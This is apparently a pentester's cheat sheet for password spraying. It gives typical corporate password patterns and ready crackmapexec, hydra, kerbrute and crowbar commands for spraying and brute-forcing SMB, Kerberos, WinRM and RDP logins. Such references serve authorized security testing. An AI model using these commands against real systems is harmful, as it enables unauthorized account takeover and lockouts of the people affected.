Password Spraying

Passowords to spray

- Common passwords used in companies

Companyname2023
Companyname.2023
Companyname_2023
Companyname2023!
Month2023
Month.2023
Month_2023
Month2023!

- Targeted passwords

To create passwords to target a specific user base on the information we have available:

• cupp (https://github.com/Mebus/cupp)

• crunch (https://github.com/MASTREX/Crunch-for-Windows)

SMB Password Spraying and brute-forcing

crackmapexec smb <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>

crackmapexec smb <IP> -u users.txt -p users.txt --no-bruteforce

crackmapexec smb <IP> -u users.txt -p users.txt --continue-on-success

hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> smb://<IP> -u -vV

hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

Kerberos Password Spraying and brute-forcing

It is also possible to block user accounts. Thus, this technique should be used carefully.

• kerbrute: https://github.com/ropnop/kerbrute
• With kerbrute.py (https://github.com/TarlogicSecurity/kerbrute):

python kerbrute.py -domain <domain_name>-users <users_file>-passwords <passwords_file>-outputfile <output_file>

Examples:

Username bruteforce

kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt

Password bruteforce

kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username

Password spray

kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123

kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt

kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log

Winrm brtue-forcing

crackmapexec winrm <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>

RDP brute-forcing

crowbar -b rdp -s <IP>/CIDR -u <USER> -C <PASSWORDS_LIST> crowbar -b rdp -s <IP>/CIDR -U <USERS_LIST> -C <PASSWORDS_LIST>

hydra -f -L <USERS_LIST> -P <PASSWORDS_LIST> rdp://<IP> -u -vV